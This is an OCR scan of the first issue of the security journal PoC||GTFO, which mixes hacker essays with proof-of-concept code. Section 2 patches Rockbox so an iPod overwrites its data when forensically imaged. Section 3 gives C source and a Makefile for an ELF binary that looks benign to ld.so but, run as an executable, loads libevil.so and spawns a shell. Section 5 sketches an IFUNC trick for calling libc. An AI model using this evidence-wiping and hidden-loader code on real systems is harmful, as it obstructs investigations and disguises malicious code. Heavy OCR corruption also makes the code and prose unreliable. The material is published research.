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Legal Note: Permission to use all or part of this work for personal, classroom, or whatever other use is NOT 

grantcd unlcss you make a copy and pass it to a ncighbor without fcc, oxccpting libations offcrcd by tho aforomontioncd 
neighbor in order to faciUtate neighborly hacking, and that said copy bears this notice and the full citation on the first 
page. Because if burning a book is a sin — which it surely is! — then copying of a book is your sacred duty. For uses in 
outcr spacc whcrc a ncighbor to sharc with cannot bc roadily found, scck blossing frorn tho Pastor and kindly provide 
your orbital ephemerides and radio band so that updates could be beamed to you via the Southern Appalachian 
Space Agency (SASA). 

1 Call to Worship 

Neighbors, please join me in reading this first issue of the International Journal of Proof of Concept or Get 
the Fuck Out, a fricndly littlc journal for ladics and gcntlcmen of distinguished ability and taste in the field 
of computer security and the architecture of weird machines. 

In Section 2, Travis Goodspeed will show you how to build your own antiforensics hard disk out of an 
iPod by simple patching of thc opcn source Rockbox firmware. The result is a USB disk, which still plays 
music, but which will also self destruct if forensically imaged. 

In Section 3, Julian Bangert and Sergey Bratus provide some nifty tricks for abusing the differences in 
ELF dialcct bctwccn cxcc() and Id.so. As an cxamplc, thcy producc a file that is both a hbrary and an 
executable, to the great confusion of reverse engineers and their totally legitimate IDA Pro Ucenses. 

Section 4 is a sermon on the subjects of Bitcoin, Phrack, and the den on iniquity known as the RSA 
Confcrcncc, inviting all of you to kill somc trccs in ordcr to savc somc source. It brings the joyful news that 
we should all shut the fuck up about hat colors and get back to hacking! 

Delivering even more nifty ELF research, Bx presents in Section 5 a trick for returning from the ELF 
loadcr into a hbc function by abusc of thc IFUNC symbol. Thcrc's a catch, though, which is that on amd64 
her routine seems to pass a very restricted set of arguments. The first parameter must be zero, the second 
must be the address of the function being called, and the third argument must be the address of the symbol 
bcing dcrcfcrcnccd. Readers who can extend this into an arbitrary return to Hbc are urged to do it and share 
the trick with others! 

Remembering good times, Section 6 by FX tells us of an adventure with Barnaby Jack, one which features 
a golden vending machinc and somc hcalthy advicc to gct thc fuck out of Abu Dhabi. 

Finally, in Section 7, we pass the coUection plate and beg that you contribute some PoC of your own. 
Articles should be short and sweet, written such that a clever reader will be inspired to build something 
nifty. 
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2 iPod Antiforensics 



by Travis Goodspeed 

In my lecture introducing Active Disk Antiforensics at 29C3, I presented tricks for emulating a disk with 
self defense features using the Facedancer board. This brief article will show you how to build your own 
antiforensics disk out of an iPod by patching the Rockbox framework. 

To quickly summarize that lecture: (1) USB Mass Storage is just a wrapper for SCSI. We can implement 
these protocols and make our own disks. (2) A legitimate host will foUow thc filesystem and partition data 
structure, whilc a mahcious host — that is to say, a forensics investigator's workstation — will read the disk 
image from beginning to end. There are other ways to distinguish hosts, but this one is the easiest and has 
fewest false positives. (3) By overwriting its (;ontcnts as it is being imaged, a disk can destroy whatever 
evidence or information the forensics investigator wishes to obtain. 

There are, of course, exceptions to the above rules. Some high-end imaging software will image a disk 
backward from the last sector toward the first. A law-enforcemcnt forensics lab will never mount a volume 
before imaging it, but an amateur or a lab less concerned with a clean prosecution might just copy the 
protected files out of the volume. 

Finally, there is the risk that an antiforensics disk might be identified as such by a forensics investigator. 
The disk's security rehes upon the forensics technician triggering the erasure, and it won't be suHicient if the 
technician knows to work around the defenses. For example, he could revert to the recovery ROM or read 
the disk directly. 

2.1 Patching Rockbox 

Rockbox exposes its hard disk to the host through USB Mass Storage, where handler functions implement 
each of the different SCSI commands needed for that protocol. To add antiforensics, it is necessary only to 
hook two of thosc functions: READ(IO) and WRITE(IO). 

In f irmware/usbstack/usb_storage . c of the Rockbox source code, blocks are read in two places. The 
first of these is in handle_scsi(), near the SCSI_READ_10 case. At the end of this case, you should see a call 
to send_and_rcad_ncxt(), which is thc sccond function that must be patchcd. 

In hoth of these, it is necessary to add code to both (1) observe incoming requests for illegal traffic and 
(2) overwrite sectors as they are requested after the disk has detected tampering. Because of code duphcation, 
you will find that somc data lcaks out through scnd_and_rcad_ncxt() if you only patch handlc_scsi(). (If these 
function names mean nothing to you, then you do not have the Rockbox code open, and you won't get much 
out of this article, now will you? Open the damn code!) 

On an iPod, thcrc will ncvcr bc any legitimate reads over USB to thc firmwarc partition. For our PoC, 
let's trigger self-destruction when that region is read. As this is just a PoC, this patch will provide nonsense 
replies to reads instead of destroying the data. Also, the hardcoded values might be specific to the 2048-byte 
sector dcviccs, such as thc morc rcccnt iPod Vidco hardwarc. 

The foUowing code should be placed in the SCSI_READ_10 case of handle_scsi(). tamperdetected 
is a static bool that ought to be declared earlier in usb_storage . c. The same code should go into the 
send_andjread_next() function. 

//These sectors are for 2048-byte sectors. 

//Multiply by 4 for devices with 512-byte sectors. 
if (cur_cmd.sector>=10000 && cur_cmd. sector<48000) 
taiiiperdetected=true ; 

//This is the legitimate read. 
cur_cmd.last_result = storage_read_sectors( 

IF_MD2(cur_cmd. lun, ) cur_cmd. sector , 

MIN(READ_BUFFER_SIZE/SECTOR_SIZE, cur_cmd. count) , 
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cur_cmd . data [cur_cmd . data_select] 

); 

//Here, we wipe the buffer to demo antif orensics . 
if (tamperdetected) ■[ 

f or(i=0; i<READ_BUFFER_SIZE; i++) 

cur_cmd . data [cur_cmd . data_select] [i] =OxFF; 
//Clobber the buffer for testing. 
strcpy (cur_cmd . data [cur_cmd . data_select] , 
"Mever gonna let you down."); 

//Comment the following to meike a harmless demo. 
//This writes the buffer back to the disk, 
//eliminating any of the old contents. 
if (cur_cmd . sector>=48195) 
storage_write_sectors ( 

IF_MD2 (cur_cmd . lun, ) 

cur_cmd. sector, 

MIN(WRITE_BUFFER_SIZE/SECTOR_SIZE, cur_cmd. count) , 
cur_cmd.data[cur_cmd.data_select] ) ; 

} 

2.2 Shut up and play the single! 

Neighbors who are too damned lazy to read this article and implement their own patches can grab my 
Rockbox patches from https://github.com/travisgoodspeed/. 

2.3 Bypcissing Antiforensics 

This sort of an antiforensics disk can be most easily bypassed by placing the iPod into Disk Mode, which 
can be done by a series of key presses. For example, the iPod Video is placed into Disk Mode by holding the 
Select and Menu buttons to reboot, then holding Select and Play/Pause to enter Disk Mode. Be sure that 
thc dcvicc is at least partially charged, or it will continue to reboot. Another, surer method, is to remove 
the disk from the iPod and read it manually. 

Further, this PoC does not erase evidence of its own existence. A fuU and proper implementation ought 
to replace the firmware partition at the beginning of the disk with a clean Rockbox build of the same revision 
and also expand later partitions to fill the disk. 

2.4 Neighborly Greetings 

Kind thanks are due to The Grugq and IntSO for their work on traditional antiforensics of filesystems and 
filc formats. Thanks are also due to Scott Moulton for discretely correcting a few of my false assumptions 
about real-world forensics. 

Thanks are also due to my coauthors on an as-yet-unpubhshed paper which predates all of my active 
antiforensics work but is being held up by the usual academic nonsense. 
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3 ELFs are dorky, Elves are cool 



by Sergey Bratus and Julian Bangert 

ELF ABI is beautiful. It's one format to rule all the tools: when a compiler writes a love letter to the 
Unker aboiit its prccious objects, it uses ELF; when the RTLD performs runtime relocation surgery, it goes 
by ELF; when the kernel writes an epitaph for an uppity process, it uses ELF. Think of a possible world 
where binutils would use their own separate formats, all ahke, leaving you to navigate the maze; or think of 
how ugly a binary format that's all things to all tools could turn out to be (*cough* ASN.l, X.509 *cough*), 
and how hard it'd be to support, say, ASLR on top of it. Yet ELF is beautiful. 

Verily, when two parsers see two different structures in the same bunch of bytes, trouble ensues. A 
difference in parsing of X.509 certificates nearly broke the internets' SSL trust model^ . The latest Android 
"Master Key" bugs that compromised APK signature veriflcation are due to different interpretation of archive 
metadata by Java and C++ parsers/unzippers^ - yet another security model-breaking parser differential. 
Similar issues with parsing other common formats and protocols may yet destroy remaining trust in the open 
Internet - but see http://laiigsec.org/ for how we could start about fixing them. 

ELF is beautiful, but with great beauty there comes great responsibihty - for its parsers.^ So do all the 
different binutils components as well as the Linux kernel see the same contents in an ELF file? This PoC 
shows that's not the case. 

There are two major parsers that handle ELF data. One of them is in the Linux kernel's implementation 
of execve(2) that creates a new process virtual addrcss space from an ELF file. The other - since the majority 
of executables are dynamicahy hnked - is the RTLD {ld.so(8j, which on your system may be caUed something 
Uke /lib64/ld-linux-x86-64-so.2^ , which loads and Unks your shared Ubraries - into the same address space. 

It would seem that thc kcrnel's and thc RTLD's vicws of this address spacc must be the same, that is, 
their respective parsers should agree on just what spans of bytes are loaded at which addresses. As luck and 
Linux would have it, they do not. 

The RTLD is essentially a complex name service for the process namespace that needs a whole lot of 
configuration in the ELF file, as complex a tree of C structs as any. By contrast, the kcrncl side just looks 
for a flat table of offsets and lengths of the flle's byte segments to load into non-overlapping address ranges. 
RTLD's conflguration is held by the .dynamic section, which serves as a directory of aU the relevant symbol 
tables, their related string tables, relocation entries for the symbols, and so on.^ The kernel merely looks 
past the ELF header for the flat table of loadable segments and proceeds to load these into memory. 

As a result of this double vision, the kernel's view and the RTLD's view of what belongs in the process 
address space can be made starkly different. A libpoc.so would look like a perfectly sane Ubrary to RTLD, 
caUing an innocent "Hello world" function from an innocent libgood.so Ubrary. However, when run as an 
executable it would cxposc a diffcrent .dynamic tablc, link in a diffcrcnt Ubrary libevil.so, and call a vciry 
different function (in our PoC, dropping sheU). It should be noted that Id.so is also an executable and can bc 
used to launch actual executables lacking executable permissions, a known trick from the Unix antiquity;^ 
however, its construction is diffcrcnt. 

The core of this PoC, makepoc.c that crafts the dual-use ELF binary, is a rather nasty C program. It is, 
in fact, a "backport-to-C" of our Ruby ELF manipulation tool Mithrif, inspired by ERESfi, but intended 
for UberaUy rewriting binaries rather than for ERESI's subtle surgery on the Uve process space. 

^Scc "PKI Layer Cake" http://ioactive.com/pdfs/PKILayerCake.pdf by Dan Kaminsky, Len Sassaman, and Meredith L. 

Pattcrson 

^See, e.g., http://www.saurik.com/id/18 and http://www.saurik.com/id/17. 

^Cf. "Thc Format and thc Parscr", a httlc-known variant of thc "Thc Bcauty and the Beast". They resolved their parser 
diffcrcntials and hvcd vulnlcssly cvcr aftcr. 

^Just objcopy -0 binary -j . interp /bin/ls /dev/stdout, wasn't that easy? :) 

■''To acfiicvc RTLD cnHghtcnmcnt, mcditatc on the grugq's http://grugq.github.io/docs/subversiveld.pdf and mayhem's 
http : //s . eresi-project . org/inc/articles/elf-rtld. txt, for surely these are the incarnations of the ABI Buddhas of our 
age, and none has described the runtime dynamic linking internals better since. 

®/lib/ld-linux.so <wouldbe-execf ile> 

'^https : //github. com/jbangert/mithril 

*http : / /www . eresi-pro j ect . org/ 
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makepoc . c 

/ met a professor of arcane degree 
Who said: Two vast and handwritten parsers 
Live in the wild . Near them , in the dark 
Half sunk , a shattering exploit lies , whose frown , 
And wrinkled lip , and sneer of cold command, 
Tell that its sculptor well those papers read 
Which yet survive , stamped on these lifeless things 
The hand that mocked them and the student that fed 
And on the terminal these words appear: 
"My name is Turing , wrecker of proofs : 
Parse this unamhigously , ye machine , and, despair !" 
Nothing besides is possible . Round the decay 
Of that colossal wreck , boundless and bare 
The lone and level root shells fork away . 
— Inspired by Edward Shelley 



V 

#include 
#include 
#include 
#include 
#include 
#define 



<elf .h> 
<stdio . h> 
<stdlib .h> 
< s t r i n g . h> 
<assert .h> 
PAGESIZE 4096 



sizc_t filcsz ; 
char f i 1 e [ 3 * PAGESIZE ] ; 



//This is the enormous buffer holding the ELF file. 
// For neighbours running this on an Electronica BK, 
// the size might have to be reduced. 
Elf64_Phdr * find_dynamic ( Elf64_Phdr *phdr ) ; uint64_t find_dynstr ( Elf64_Phdr *phdr); 
/* New memory layout 

Memory mapped to File Offsets 
Ok ++++\ I I ELF Header 1 1 



4k 



+ 

+ 
+ 
+ 

++> 



First 

Page 



+= 



=+ 

Second \ * 
Page \ ■■ 



I ( orig . code ) \ 
I (real .dynamic)\ <- 
+ =+ 



kernel-phdr 



I LD.so/kernel boundary assumes 

-+ the offset that applies on disk 

I works also in memory; however , 

I if phdrs are in a different 

\< — I — segment , this won't hold . 



+= 



=+ 



+= 



Idso -phdrs 
fake . dynamic 
w/ new dynstr 



=+ 



<- 



Somewhere far below , there is the . data segment (which we ignore) 

*/ 

int elf _magic () { 

Elf64_Ehdr *ehdr = file ; 

Elf64_Phdr *orig_phdrs = file + ehdr— >e_phoff ; 
Elf64_Phdr *firstload , * phdr ; 
int i=0; 
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//For the sake of brevity , we assume a lot about the layout of the program : 
assert ( f ilesz >PAGESIZE) ; //First 4K has the mapped parts of program 
assert ( filesz <2*PAGESIZE) ; //2nd 4^ holds the program headers for the kernel 

//3rd 4k holds the program headers for Id . so + 
// the new dynamic section and is mapped just above the program 
for ( firstload = orig.phdrs ; firstload — >p_type!=PTJLOAD; firstload ++); 
a s s e r t (0 = f i r s 1 1 o a d — > p_offsct ); 

assert (PAGESIZE > firstload — >p_inemsz ) ; / / 2nd page of memory will hold 2nd segment 
uint64_t base_addr = ( fir stload — >p_vaddr & "Oxffful); 

/ /PHDRS as read by the kernel's execve () or dlopen(), but NOT seen by Id . so 
Elf64_Phdr * kernel_phdrs = file + filesz; 

memcpy ( kcrncl_phdrs , orig_phdrs , chdr— >c_phnum * sizeof ( Elf64_Phdr ) ) ; //cop?/ PHDRs 
ehdr— >e_phoff = (char *) kernel_phdrs — file; //Point ELF header to new PHDRs 
ehdr— >e_phnum++; 

/ / Add a new segment (PTJjOAD) , see above diagram 

Elf64_Phdr *new_load = kernel_phdrs + ehdr— >e_phnum — 1; 

new_load->p_typc = PTiOAD; 

new_load— >p_vaddr = base_addr + PAGESIZE; 

new_load— >p_paddr = new_load— >p_vaddr ; 

new_load->p_offset = 2*PAGESIZE; 

new_load->p_filesz = PAGESIZE; 

new_load— >p_memsz = new_load— >p _f ilesz ; 

new_load->p_flags = PF_R | PF_W; 

// Disable large pages or Id . so complains when loading as a . so 
for ( i =0; i<ehdr— >e_phnum ; i++){ 

if (kernel_phdrs [ i ] . p_typc = PTiOAD) 
kernel_phdrs [ i ] . p_align = PAGESIZE; 

} 

//Setup the PHDR table to be seen by Id.so, not kernel 's execve() 
Elf64_Phdr *ldso_phdrs = file + ehdr->e_phoff 

— PAGESIZE // First 4^ of program address space is mapped in old segment 

+ 2*PAGESIZE; // Offset of new segment 
memcpy( ldso_phdrs , kernel_phdrs , ehdr— >e_phnum * sizeof ( Elf64_Phdr ) ) ; 
//Id.so 2.17 determAnes load bias (ASLR) of main binary by looking at PTJ-'HDR 
for (phdr=ldso_phdrs ; phdr->p_type != PT_PHDR; phdr++); 

phdr— >p_paddr = base_addr + ehdr— >e_phoff ; //Id.so expects PHDRS at this vaddr 

//This isn 't used to find the PHDR table , but by Id . so to compute ASLR slide 
// (main-map—>l-addr ) as (actual PHDR address )— (PHDR address in PHDR table) 
phdr— >p_vaddr = phdr— >p_paddr ; 

//Make a new . dynamic table at the end of the second segment , 

// to load libevil instead of libgood 

unsigned dynsz = find_dynamic ( orig_phdrs)— >p_mcmsz ; 

Elf64_Dyn *old_dyn = file + find_dynamic ( orig_phdrs)— > p _of f set ; 

Elf64_Dyn *ldso_dyn = (char *)ldso_phdrs + ehdr— >e_phnum * sizeof ( Elf64_Phdr ) ; 

memcpy( ldso_dyn , old_dyn , dynsz ) ; 

//Modify address of dynamic table in Idso-phdrs (which is only used in exec()) 
find_dynamic ( ldso_phdrs)— >p_vaddr = base_addr + (char *) ldso_dyn — 
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file - PAGESIZE; 

/ /We need a new dynstr entry . Luckily Id . so doesn't do range checks on strtab 
// offs ets , so we just stick it at the end of the file 
char * ldso_needed_str = (char *)ldso_dyn + 

ehdr— >e_phnum * sizeof ( Elf64_Phdr ) + dynsz ; 

strcpy(ldso_needed_str , " libcvil .so" ); 

assert (ldso_dyn->d_tag = DTJslEEDED) ; //replace 1 st dynamic entry , DTJSIEEDED 
ldso_dyn— >d_un . d_ptr = base_addr + ldso_needed_str — file — 
PAGESIZE - find_dynstr (orig_phdrs ); 

} 

void readfile () { 

FILE *f= fopcn (" targct . handchccked" ," r" ) ; 

//provided binary because the PoC might not like the output of your compiler 
assert ( f ) ; 

filcsz = fread(file ,l,sizeof file ,f); // Read the entire file 
fclose ( f ) ; 

} 

void writefile (){ 

FILE *f= fopen("libpoc.so" ,"w"); 
fwrite(file , sizeof file ,l,f); 
fclose ( f ) ; 

system ("chmod^+x^libpoc . so" ) ; 

} 

Elf64_Phdr * find_dynamic ( Elf64_Phdr *phdr){ 
//Find the PTJ^YNAMIC program header 
for (;phdr->p_type != PTJDYNAMC; phdr++); 
return phdr ; 

} 

uint64_t find_dynstr (Elf64_Phdr *phdr){ 

//Find the address of the dynamic string table 
phdr = find_dynamic ( phdr ) ; 
Elf64_Dyn *dyn; 

for(dyn = filc + phdr->p _offset ; dyn->d_tag != DT_STRTAB; dyn++); 
return dyn— >d_un . d_ptr ; 

} 

int main() 
{ 

readfile ( ) ; 

elf _magic ( ) ; 
writefile (); 

} 

# Makcfilc 

%.so: %.c 

gcc — fpic — sharcd — Wl, — sonamc , $@ — o $@ $~ 
all : libgood . so libcvil.so makepoc target libpoc . so all_is_well 

libpoc . so : target . handchecked makepoc 
. / makepoc 

clean : 

rm — f *.so *.o target makepoc all_is_well 



7 



target : target.c libgood . so libevil.so 

echo "#define.INTERP„\" ' objcopy .-Cbinary „-j „ . interp„\ 
„„„„„„„„ /bin/ Is ^/dev/ stdout '\" " » interp . inc &&: gcc — o target \ 

— Os — Wl, — rpath,. — Wl, — cfoo — L . — sharcd — fPIC — Igood targct.c \ 
kh strip — K foo $@ && echo ' copy ^ target ^to ^ target . handchecked^by^hand ! ' 

target . handchccked : target 

cp $< $@; echo "Beware , ^you^compiled^target ^yourself . ^\ 
„„„„„„„„ JYIVIMV^with^your ^compiler ,„this^is^just^a^friendly ^poc" 

all_is_well: al 1 _ i s _ w e 1 1 . c libpoc . so 

gcc -o $@ -Wl,-rpath,. -Ipoc -L. $< 
makepoc : makepoc . c 

gcc -ggdb -o $@ $< 

/* target.c */ 

#include <stdio.h> 
#include "interp.inc" 

const char my_interp [] _ _at t r ibut e _ _ ( ( sect ion ( " . inter p " ) ) ) = INTERP; 
extern int func(); 
int foo(){ 

// printf (" Calling func\n" ) ; 

func ( ) ; 

exit(l); //Needed, because there is no crt.o 

} 

/* libgood . c */ 

#include <stdio.h> 

int func(){ pr int f ( " Hello .World\n" ) ; } 

/* lib evil . c */ 

#include <stdio.h> 
int func(){ system (" /bin/sh" ) ; } 

/* all-is -w ell . c */ 

extern int foo ( ) ; 

int main(int argc , char **argv) 

{ 

foo(); 

} 

3.1 Neighborly Greetings and \cite{}s: 

Our gratitiidc gocs to Silvio Ccsarc, thc grugq, klog, mayhcm. and Ncrgal. whosc brilliant articlcs in Phrack 
and clscwhcrc taiight \is about thc ELF format, runtimc, and ABL Spccial thanks go to thc ERESI tcam, who 
sct a high standard of ELF (rc)cnginccring to foUow. Skapc's article Uninformed 6:3 lcd us to re-examine 
ELF in thc light of wcird machincs, and wc thank .Bx for showing how to builcl thosc to fuU gcncrality. 
Last but not lcast, our view was profoundly shaped by Lcn Sassaman and Mercdith L. Patterson's aniazing 
insights on parser differentials and their work with Dan Kaminsky to explore them for X.509 and other 
Internet protocols and formats. 
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4 The Pastor Manul Laphroaig's First Epistle to Hacker Preachers 
of AU Hats, in the sincerest hope that we might shut up about 
hats, and get back to hacking. 

First, I must caution you to cut out the Sun Tsu quotes. While every good speaker indulges in quoting from 

good books of fiction or philosophy, verily I warn you that this can lead to unrighteousness! For whcn wc 
teU beginners to study ancient philosophy instead of engineering, they will become experts in the Art of War 
and not in the Art of Assembly Language! They find themselves reading Wikiquote instead of Phrack, and 
we are all the poorer for it! 

I beg you: Rather than beginning your sermons with a quote from Sun Tzu, begin them with nifty httle 
tricks which the laity can investigate later. For example, did you know that 'strings -n 20 /.bitcoin/blkOOOl.dat' 
dumps ASCII art portraits of both Saint Sassaman and Bcn Bcrnankc? This art was cncodcd as fakc pubHc 
keys used in real transactions, and it can't be removed without undoing all Bitcoin transactions since it was 
inserted into the chain. The entire Bitcoin economy depends upon the face of the chairman of the Fed not 
being removed from its ledger! Isn't that clever? 

Speaking of cleverness, show respect for it by citing your scripture in chapter and verse. Phrack 49:14 
tells us of Alephl's heroic struggle to explain the way the stack really works, and Uninformed 6:2 is the 
harrowing talc of Johnny Cache, H D Moore, and Skape exploiting the Windows kernel's Wifi drivers with 
beacon frames and probe responses. These papers are memories to be cherished, and they are stories worth 
teUing. So tell them! Preach the good word of how the hell things actually work at every opportunity! 

Don't just preach the gospel, give the good word on paper. Print a dozen copies of a nifty paper and 
give them away at the next con. Do this at Recon, and you will make fascinating friends who wiU show you 
things you never knew, no matter how well you knew them before. Do this at RSA-without trying to sell 
anything-and you'll bc a vcritable hero of cnhghtenment in an expo center of half-assed sales pitches and 
booth babes. KiU some trecs to save some souls! 

Don't just give papers that others have written. Give early drafts of your own papers, or better stiU your 
own documcntcd Oday. Nothing dcmonstrates neighborUness Uke the gift of a good exploit. 

Furthcr, I must warn you to ignore this Black Hat / Whitc Hat nonsense. As a Straw Hat, I teU you 
that it is not thc color of the hat that counts; rather, it is thc wcavc. Wc know damned weU that patching a 
miUion bugs won't kccp the bad guys out, just as we know that thc vendor who covers up a bug causcd by his 
own incompetence is hardly a good guy. We see righteousness in cleverness, and we study exploits because 
they are so damnably clever! It is a heroic act to build a debugger or a disassembler, and the knowledge of 
how to do so ought to bc sprcad far and widc. 

First, considcr thc Whitc Hats. Black Hats are quick to judgc tlicsc poor fcUows as do-goodcrs who 
kill bugs. They ask, "Who would want to kill such a lovely bug, onc which givcs us such clcvcr cxploits?" 
Verily I teU you that death is a necessary part of the ecosystem. Without neighbors squashing old bugs, 
what incentivc would therc bc to find more clever bugs or to write more clever exploits? Truly I say to the 
Black Hats, you have recouped every doUar you've lost on bugfixes by the selective pressure that makes your 
exploits valuablc enough to sustain a market! 

Next, considcr the Black Hats. White Hat neighbors arc still quickcr to judge these poor feUows, not so 
much for seUing their exploits as for hoarding thcir knowledge. A ncighbor once told me, "Look at these 
sinners! They hide their knowledge like a candle beneath a basket, such that none can learn from it." But 
don't be so quick to judge! While it's true that the Black Hats publish more slowly, do not mistake this 
for not pubUshing. For does not a candle, when hidden beneath a basket, soon set the basket ahght and 
burn ten times as bright? And is not self-replicating malware just a self-replicating whitepaper, written in 
machine language for the edification of those who read it? Verily I teU you, even the Black Hats have a 
neighborUness to them. 

So please, shut about hats and get back to the code. 

— M. Laphroaig 

Postscript: This little light of mine, Fm gonna let it shine! 
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5 Returning from ELF to Libc 



by Rebecca "Bx" Shapiro 

Dear friends, 

As you may or may not know, dcmons lurk within ELF mctadata. If you have not yet bccn introduced 
to these creatures, please put this paper down and take a look at either our talk given at 29C3^, or our 
soon-to-be released WOOT pubHcation (in August 2013). 

Althoiigh the abihty to trcat thc loadcr as a Tiiring-completc machinc is Pretty_Neat, wc rcalizc that 
there are a lot of useful computation vectors built right into the hbraries that are mapped into the loader 
and executable's address space. Instead of re-inventing the wheel, in this POC sermon we'd like to begin 
exploring how to harncss thc powcr givcn to us by the perhaps almighty hbc. 

The System V amd64 ABI scripture^" in combination with the eglibc-2.17 writings have provided us ELF 
demon-tamers with the mighty useful IFUNC symbol. Any symbol of type IFUNC is treated as an indirect 
function - the symbol's value is treated as a function, which takes no arguments, and whose return value is 
the patch. 

The question we will explore from here on is: Can we harness the power of the IFUNC to invoke a piece 
of hbc? 

After vaguely thinking about this problem for a couple of months, we have finally made progress towards 
the answer. 

Consider the exit() hbrary caU. Although one may question why we would want to craft metadata that 
causes a exit() to be invoked, we will do so anyway, bccausc it is one of the simplest calls we can make, 
because the singlc argument it takes is not particularly important, and success is immediately obvious. 

To invokc exit(), we must lookup the following information whcn wc arc compiling thc crafted metadata 
into some host executable. This is accomplished in three steps, as we explain in our prior work. 

1. The location of exit() in the libc binary. 

2. The location of the host executable's dynamic symbol table. 

3. The location of the host executable's dynamic relocation table. 
To invoke exit(), we must accomplish the following during runtime: 

1. Lookup the base address of hbc. 

2. Usc this basc addrcss to calculatc thc location of cxit() in memory. 

3. Storc thc address of exit() in a dynamic IFUNC symbol. 

4. Causc thc symbol to be resolved. 
. . . and then there was exit()! 

Our prior work has dcmonstratcd how to accomphsh thc first two tasks. Oncc thc first two tasks havc 
been completed at runtime, we find ourselves with a normal symbol (which we will call symbol 0) whose 
value is the location of exit(). At this point we have two ways to proceed: we can 

(1) havc a sccond dynamic symbol (namcd symbol 1) of typc IFUNC and have relocation cntry of typc 
RJC86_64_64 which refers to symbol 0 and whose offset is set to the location of symbol l's values, causing 
the location of ext() to be copied into symbol 1, 

-or- 

(2) update the type of the symbol that aheady has the address of exit() to that it becomes an IFUNC. 
This can be done in a single relocation entry of type R_X86_64, whose addend is that which is copied to the 

^https : //www . youtube . com/watch?v=dnLYoMIBhpo 
l°http : //www . uclibc . org/docs/psABI-x86_64 . pdf 
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first 8 bytcs of symbol 0. If we sct thc addcnd to OxOlOOOOOaOOOOOOOO, wc will find that thc symbol type 
will become OxOa (IFUNC), the symbol shndx will be set as 01 so the IFUNC is treated as defined, and the 
other fields in the symbol structure will remain the same. 

Aftcr our mctadata tliat sets up the IFUNC, wc nccd a rclocation entry of type R_X86_64_64 that 
references our IFUNC symbol, which will cause exit() to be invoked. 

At this moment, you may be wondering how it may be possible to do more interesting things such as have 
control of the argument passed to the function call. It turns out that tliis problem is still bcing rcscarchcd. 
In eglibc-2.17, at the time the IFUNC is called, the first argument is and will always be 0, the second 
argument is the address of the function being called, and the third argument the addressed of the symbol 
being rcfcrcnccd. Thcrcforc at this lcvcl cxcc(O) is always callcd. It will clcarly takc some clever redirection 
magic to be able to have control over the function's arguments purely from ELF metadata. 

Perhaps you will see this as an opportunity to go on a quest of ELF-discovery and be able to take this 
work to thc ncxt lcvcl. If you do discovcr a path to argument control, we hope you will take the time to 
share your thoughts with the wider community. 

Peace out, and may the Manul always be with you. 
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6 GTFO or #FAIL 



by FX of Phenoelit 

To honor the memory of the great Barnaby Jack, we would like to relate the events of a failed POC. It 
happened on the second day of the Black Hat Abu Dhabi conference in 2010 that the hosts, impressed by 
Barnaby's presentation on ATMs,^^ pointed out that the Emirates Palace hotel features a gold ATM^^. So 
they asked him to see if he could hack that one too. 

Never one to reject challenges or fun to be had, Barns gathcrcd a bunch of fcllow hackers, who shall 
remain anonymous in this short tale, to accompany him to the gold ATM. SufHcient to say, yours truly was 
among them. Thus it happened that a bunch of hackers and a number of hosts in various white and pastel 
colored thawbs went to pay the gold ATM a visit. Our hosts had assured everyone in the group that it was 
totally OK for us to hack the machine, as long as they were with us. 

6.1 The POC 

While the gold ATM, being plated with gold itself, looked rather solid^^, a look at the back of the machine 
revcalcd a mcssy knot of cablcs, thc typc of wiring normally found on a Travis Goodspeed desk. Since the 
machine updates the gold pricing information online, we obviously wanted to have a look at the trafhc. We 
therefore disconnected the flimsy network connections and observed the results, of which there were initiahy 
none to be obscrvcd, cxccpt for the machinc to start beeping in an alarming way. 

Nothing being boring, we decided to power cycle the machine and watch it boot. For that, yours truly 
got behind it and used his considerable power cable unplugging skihs to their fullest extent. Interestingly 
enough, thc gold ATM staycd opcrational, obviously bcing cquipped with the only Uninterruptable Power 
Source (UPS) in the world that actually provides power when needed. 

Reappearing from behind the machine, happily holding the unplugged network and power cables, yours 
truly obscrvcd thc group of hosts bcing ahcady far away and thc group of hackcrs following closc bchind. 
Inverting their vector of movement, the cause of the same became obvious with the approaching storm 
troopers of Blackwater quality and quantity. Therefore, yours truly joined the other hackers at considerable 
speed. 

6.2 The FAIL 

Needless to say, what foUowed was a tense afternoon of drinking, waiting, and considering exit scenarios from 
a certain country, depending on individual citizenships, while powers to be were busy turning the incident 
into a non-issue. 

The #FAIL was quickly identified as the inability of the fellowship of hackers to determine rank and 
therefore authority of people that aU wear more or less the same garments. What had happened was that 
the people giving authority to hack the machine actually did not possess said authority in the first place or, 
alternatively, had pissed ofl: someone with more authority. 

The failed POC pointed out the beneflts of western mihtary uniforms and their rank insignia quite clearly. 

6.3 Neighborly Greetings 

Neighborly greetings are in order to Mr. Nils, who, upon learning about the incident, quietly handed the 
local phone number of the German embassy to yours truly. 



^^https : //wwM.blackhat . com/html/bh-ad-lO/bh-ad-lO-archives .html\#Jack 

^■^http://www.nydailynews .com/2. 1353/abu-dhabi-emirates-palace-hotel-sports-vending-machine-gold-article-l. 
449348 

^^http : / /www . gold-to-go . com/en/ company/history/ 
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7 A Call for PoC 



by Rt. Revd. Pastor Manul Laphroaig 

We stand, sit, or simply relax and chill on the shoulders of the giants, Phrack and Uninformed. They 

pushcd thc statc-of-thc-art forward mightily with awcsomc, dccp papcrs and at timcs cvcn with poctry to 
match. And whcn a single step carries you forward by a measure of academic years, it's OK to move slowly. 

But for thc rcst of us dwarves, running around or lounging on those broad shoulders can be so much fun! 
A hot PoC is fun to toss to a ncighbor, and who knows what somc neighbor will cook up with it for the 
sharcd roast of thc vuln-beast? A neighbor might think, "my PoC is unexploitablc" or "it is too simple," 
but vcrily I tcU you, one neighbor's PoC is thc missing cog for another ncighbor's Oday. How much PoC is 
hoarded and Ues idle while its matching piece of PoC wastes away in another hoard? Let's find out! 



7.1 Author guidelines 

It is easy to prepare your paper for submission to IJPoC||GTFO in seven easy steps. 

1. If you have a section caUed Introduction or some such nonsense, replace it with a two-sentence statement 
of why thc rcadcr who doesn't carc about the subjcct aftcr rcading your abstract should carc, and a 
Unk to a good tutorial. Some caring neighbor must have spent a great deal of effort writing it already, 
and who needs a hundred Uttle one-pagers, aU aUke, on top of that? 

2. If you have a section caUed Motivation, see item 1. 

3. Scan your paper for tables. If you find a table, replace it with an equivalent piece of code. Repeat. 
This is important. 

4. Scan your papcr for diagrams of thc boxcs-and-arrows kind. Unlcss thc boxcs arc codc basic blocks, 
there had better be text on the arrows detailing exactly what is being sent on that arrow. If in doubt, 
replace with equivalent code. 

5. If you have a section caUed Related work, replace it with a neighborly Howdy to neighbors who did 
that work, and cite it in the text of your paper that it's related to. 

